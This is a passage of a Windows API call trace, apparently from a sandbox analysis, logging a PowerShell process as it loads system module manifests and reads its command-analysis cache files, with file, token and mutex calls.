"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c834540 | out: lpFileInformation=0x25b5c834540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6d)) returned 1 [0282.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.592] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.593] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.593] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e43ac8c6-d15c-45c3-be08-dd89270d640c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e43ac8c6-d15c-45c3-be08-dd89270d640c", lpFilePart=0x0) returned 0x93 [0282.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.593] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_e43ac8c6-d15c-45c3-be08-dd89270d640c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_e43ac8c6-d15c-45c3-be08-dd89270d640c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa80 [0282.594] GetFileType (hFile=0xa80) returned 0x1 [0282.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.594] GetFileType (hFile=0xa80) returned 0x1 [0282.595] ReadFile (in: hFile=0xa80, lpBuffer=0x25b5c8357f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8357f8*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.598] ReadFile (in: hFile=0xa80, lpBuffer=0x25b5c8375f4, nNumberOfBytesToRead=0x11, lpNumberOfBytesRead=0x653ef8cf68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8375f4*, lpNumberOfBytesRead=0x653ef8cf68*=0x11, lpOverlapped=0x0) returned 1 [0282.598] ReadFile (in: hFile=0xa80, lpBuffer=0x25b5c8357f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8357f8*, lpNumberOfBytesRead=0x653ef8d008*=0x11f, lpOverlapped=0x0) returned 1 [0282.598] ReadFile (in: hFile=0xa80, lpBuffer=0x25b5c8357f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c8357f8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.598] CloseHandle (hObject=0xa80) returned 1 [0282.598] ReleaseMutex (hMutex=0xa7c) returned 1 [0282.598] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0282.598] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0282.598] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.598] CoTaskMemFree (pv=0x25b73cfac40) [0282.598] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0282.599] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfdf40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.599] CoTaskMemFree (pv=0x25b73cfdf40) [0282.599] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.599] GetCurrentProcess () returned 0xffffffffffffffff [0282.599] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa80) returned 1 [0282.599] GetTokenInformation (in: TokenHandle=0xa80, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.599] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984bf0 [0282.599] GetTokenInformation (in: TokenHandle=0xa80, TokenInformationClass=0x1, TokenInformation=0x25b73984bf0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984bf0, ReturnLength=0x653ef8d6b8) returned 1 [0282.600] LocalFree (hMem=0x25b73984bf0) returned 0x0 [0282.600] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c83c468, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c83c468*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.600] CreateMutexW (lpMutexAttributes=0x25b5c83c5b8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa84 [0282.600] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa84, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.601] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01020 [0282.601] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01020, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.601] CoTaskMemFree (pv=0x25b73d01020) [0282.601] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0282.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.602] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c83cc08 | out: lpFileInformation=0x25b5c83cc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x209484fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x209484fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x209484fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34a)) returned 1 [0282.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.602] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_576a1f3d-d61d-4d7c-9b4a-cb2c62658a1a", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_576a1f3d-d61d-4d7c-9b4a-cb2c62658a1a", lpFilePart=0x0) returned 0x93 [0282.602] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_576a1f3d-d61d-4d7c-9b4a-cb2c62658a1a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_576a1f3d-d61d-4d7c-9b4a-cb2c62658a1a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa88 [0282.603] GetFileType (hFile=0xa88) returned 0x1 [0282.603] GetFileType (hFile=0xa88) returned 0x1 [0282.603] ReadFile (in: hFile=0xa88, lpBuffer=0x25b5c83de98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c83de98*, lpNumberOfBytesRead=0x653ef8d338*=0x5af, lpOverlapped=0x0) returned 1 [0282.605] ReadFile (in: hFile=0xa88, lpBuffer=0x25b5c83de98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c83de98*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.605] CloseHandle (hObject=0xa88) returned 1 [0282.605] ReleaseMutex (hMutex=0xa84) returned 1 [0282.605] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0282.606] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0282.606] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.606] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.606] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb900 [0282.606] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb900 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.606] CoTaskMemFree (pv=0x25b73cfb900) [0282.606] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.606] GetCurrentProcess () returned 0xffffffffffffffff [0282.606] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa88) returned 1 [0282.607] GetTokenInformation (in: TokenHandle=0xa88, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.607] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984570 [0282.607] GetTokenInformation (in: TokenHandle=0xa88, TokenInformationClass=0x1, TokenInformation=0x25b73984570, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984570, ReturnLength=0x653ef8d6b8) returned 1 [0282.608] LocalFree (hMem=0x25b73984570) returned 0x0 [0282.608] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c842910, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c842910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.608] CreateMutexW (lpMutexAttributes=0x25b5c842a60, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa8c [0282.609] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa8c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.609] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0282.609] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.609] CoTaskMemFree (pv=0x25b73cfac40) [0282.609] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0282.609] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c843098 | out: lpFileInformation=0x25b5c843098*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x764)) returned 1 [0282.609] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.609] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.610] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7670659f-b86b-4b08-98c3-1fe6a28ba23a", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7670659f-b86b-4b08-98c3-1fe6a28ba23a", lpFilePart=0x0) returned 0x93 [0282.610] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_7670659f-b86b-4b08-98c3-1fe6a28ba23a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_7670659f-b86b-4b08-98c3-1fe6a28ba23a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa90 [0282.610] GetFileType (hFile=0xa90) returned 0x1 [0282.610] GetFileType (hFile=0xa90) returned 0x1 [0282.610] ReadFile (in: hFile=0xa90, lpBuffer=0x25b5c844300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c844300*, lpNumberOfBytesRead=0x653ef8d338*=0x93a, lpOverlapped=0x0) returned 1 [0282.614] ReadFile (in: hFile=0xa90, lpBuffer=0x25b5c844300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c844300*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.614] CloseHandle (hObject=0xa90) returned 1 [0282.614] ReleaseMutex (hMutex=0xa8c) returned 1 [0282.614] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0282.614] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.614] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.614] CoTaskMemFree (pv=0x25b73d007a0) [0282.614] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfac40 [0282.614] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfac40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.615] CoTaskMemFree (pv=0x25b73cfac40) [0282.615] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.615] GetCurrentProcess () returned 0xffffffffffffffff [0282.615] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0xa90) returned 1 [0282.615] GetTokenInformation (in: TokenHandle=0xa90, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.615] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984670 [0282.615] GetTokenInformation (in: TokenHandle=0xa90, TokenInformationClass=0x1, TokenInformation=0x25b73984670, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984670, ReturnLength=0x653ef8d6b8) returned 1 [0282.616] LocalFree (hMem=0x25b73984670) returned 0x0 [0282.616] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c8495f8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c8495f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.616] CreateMutexW (lpMutexAttributes=0x25b5c849748, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0xa94 [0282.616] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0xa94, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.616] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.616] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.616] CoTaskMemFree (pv=0x25b73d01680) [0282.617] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0282.617] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c849d98 | out: lpFileInformation=0x25b5c849d98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159bf51c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x159bf51c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x159bf51c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x329)) returned 1 [0282.617] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.617] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.617] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_42a7be40-55b9-48aa-b91d-1da27a04699f", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_42a7be40-55b9-48aa-b91d-1da27a04699f", lpFilePart=0x0) returned 0x93 [0282.617] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_42a7be40-55b9-48aa-b91d-1da27a04699f" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_42a7be40-55b9-48aa-b91d-1da27a04699f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa98 [0282.618] GetFileType (hFile=0xa98) returned 0x1 [0282.618] GetFileType (hFile=0xa98) returned 0x1 [0282.618] ReadFile (in: hFile=0xa98, lpBuffer=0x25b5c84b020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c84b020*, lpNumberOfBytesRead=0x653ef8d338*=0x386, lpOverlapped=0x0) returned 1 [0282.620] ReadFile (in: hFile=0xa98, lpBuffer=0x25b5c84b020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c84b020*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.620] CloseHandle (hObject=0xa98) returned 1 [0282.620] ReleaseMutex (hMutex=0xa94) returned 1 [0282.620] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0282.621] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.621] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.621] CoTaskMemFree (pv=0x25b73cfcc20) [0282.621] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.621] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.621] CoTaskMemFree (pv=0x25b73d007a0) 